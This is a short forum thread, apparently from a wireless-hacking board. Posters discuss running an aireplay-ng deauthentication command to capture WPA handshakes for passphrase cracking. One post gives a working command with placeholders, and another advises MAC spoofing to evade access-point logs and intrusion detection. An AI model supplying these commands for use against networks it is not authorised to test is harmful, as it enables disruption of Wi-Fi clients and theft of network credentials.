Deauth Question

[sKiTzo247]

I'm newer than noob so I hope this is the right place to post this. My question is: In order to successfully execute the "aireplay-ng –deauth 1 –a (STATION) –c (BSSID) mon0" command, isn't it first necessary to use macchanger and change the mac of my "mon0" to that of the target AP? I've captured handshakes but so far only incomplete ones. I'm thinking the spoof is necessary.......?

[rastamouse]

It isn't necessary to change the mon0 MAC in order to deauth. When I deauth clients, I usually use something like:

Code:

aireplay-ng -0 1 -e {ESSID} -c {CLIENT MAC} mon0

For some reason, I find it's quite rare to capture all 4 EAPOL packets of a WPA handshake. You don't actually need all 4 to crack a WPA Passphrase though.

[sKiTzo247]

It isn't necessary to change the mon0 MAC in order to deauth. When I deauth clients, I usually use something like:

Code:

aireplay-ng -0 1 -e {ESSID} -c {CLIENT MAC} mon0

For some reason, I find it's quite rare to capture all 4 EAPOL packets of a WPA handshake. You don't actually need all 4 to crack a WPA Passphrase though.

Thank you - that works!

[sha0l1nt1ger]

It's usually good practice to spoof your MAC because some APs display the MAC address(s) as well as the host names. Good pentesting requires that you be aware of IDS(intrusion detection systems) as well.